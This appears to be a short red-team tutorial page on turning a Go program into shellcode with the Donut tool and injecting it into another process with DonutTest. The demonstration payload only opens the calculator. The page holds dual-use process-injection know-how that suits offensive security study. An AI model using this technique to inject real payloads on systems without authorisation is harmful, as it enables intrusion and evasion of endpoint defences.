Converting your GO bins to Shellcode and Using them in C#

With release of Go1.15 a new "buildmode" flag has been released. -buildmode=pie 
Lets do a simple demo of converting a go binary to shellcode and injecting it to other processes 
Building Go Binary 
I am going to build a simple golang program which launches calc 
calc.go
package main
​
import(
    "fmt"
    "os/exec"
)
​
func main(){    
    c := exec.Command("calc.exe")
​
    if err := c.Run(); err != nil { 
        fmt.Println("Error: ", err)
    }   
}
Now lets build the program. I am using Windows 10 amd64 machine. You may need to specify other parameters if you are cross compiling 
go build -buildmode=pie -o calc.exe calc.go
The command will generate a static binary calc.exe. 
Converting Binary to Shellcode
Here we will use TheWover's Donut to convert the calc.exe to shellcode. The command is quite simple 
donut.exe calc.exe -o calc.bin
Using DonutTest 
​DonutTest is a subproject of Donut repo. DonutTest provides a test harness to test your generated Shellcode.
To use our calc.bin inside donut test we need to convert it into base64 
[Convert]::ToBase64String([IO.File]::ReadAllBytes("./calc.bin")) | clip
Now paste the shellcode in DonutTest  and compile. Your program should run as expected and you should see a calc pop
DonutTest.exe <pid> 
Credits:
​https://twitter.com/rkervell​

Red Team: Using SharpChisel to exfil internal network

Next - Red Team

ShellCode Injection

Last modified 1yr ago

Copy link

Outline

Building Go Binary

Converting Binary to Shellcode

Using DonutTest

Credits: